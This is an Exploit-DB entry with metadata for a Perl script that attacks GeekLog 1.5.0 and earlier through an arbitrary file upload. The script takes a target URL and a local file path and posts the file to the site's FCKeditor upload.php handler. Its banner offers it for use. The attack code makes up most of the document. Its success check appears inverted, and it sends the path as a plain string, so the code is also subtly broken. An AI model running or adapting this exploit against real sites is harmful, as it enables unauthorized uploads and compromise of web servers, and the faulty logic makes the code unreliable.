ID EDB-ID:6306
Type exploitdb
Reporter t0pP8uZz
Modified 2008-08-25T00:00:00
Description
GeekLog <= 1.5.0 Remote Arbitrary File Upload Exploit. Webapps exploit for php platform
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ GeekLog <= 1.5.0 Remote Arbitrary File Upload +
+ +
+ Discovered && Coded By: t0pP8uZz +
+ +
+ 0day?!?Most sites need custom configuration files +
+ for this exploit to actually work, anyway enjoy +
+ +
+ Discovered On: 20 August 2008 / milw0rm.com +
+ +
+ Script Download: http://www.geeklog.net +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-08-25]
{"id": "EDB-ID:6306", "hash": "a2c997293c5e02f969b680b7e8a95539", "type": "exploitdb", "bulletinFamily": "exploit", "title": "GeekLog <= 1.5.0 - Remote Arbitrary File Upload Exploit", "description": "GeekLog <= 1.5.0 Remote Arbitrary File Upload Exploit. Webapps exploit for php platform", "published": "2008-08-25T00:00:00", "modified": "2008-08-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/6306/", "reporter": "t0pP8uZz", "references": [], "cvelist": [], "lastseen": "2016-01-31T23:36:22", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-01-31T23:36:22"}, "vulnersScore": 2.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6306/", "sourceData": "#!/usr/bin/perl\n\nuse warnings;\nuse strict;\nuse LWP::UserAgent;\nuse HTTP::Request::Common;\n\nprint <<INTRO;\n+++++++++++++++++++++++++++++++++++++++++++++++++++++\n+ GeekLog <= 1.5.0 Remote Arbitrary File Upload +\n+ +\n+ Discovered && Coded By: t0pP8uZz +\n+ +\n+ 0day?!?Most sites need custom configuration files +\n+ for this exploit to actually work, anyway enjoy +\n+ +\n+ Discovered On: 20 August 2008 / milw0rm.com +\n+ +\n+ Script Download: http://www.geeklog.net +\n+++++++++++++++++++++++++++++++++++++++++++++++++++++\n\nINTRO\n\nprint \"Enter URL(ie: http://site.com): \";\n chomp(my $url=<STDIN>);\n \nprint \"Enter File Path(path to local file to upload): \";\n chomp(my $file=<STDIN>);\n\nmy $ua = LWP::UserAgent->new;\nmy $re = $ua->request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',\n Content_Type => 'form-data',\n Content => [ NewFile => $file ] );\n\nif($re->is_success) {\n if( index($re->content, \"Disabled\") != -1 ) { print \"Exploit Successfull! File Uploaded!\\n\"; }\n else { print \"File Upload Is Disabled! Failed!\\n\"; }\n} else { print \"HTTP Request Failed!\\n\"; }\n\nexit;\n\n# milw0rm.com [2008-08-25]\n", "osvdbidlist": ["57476"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}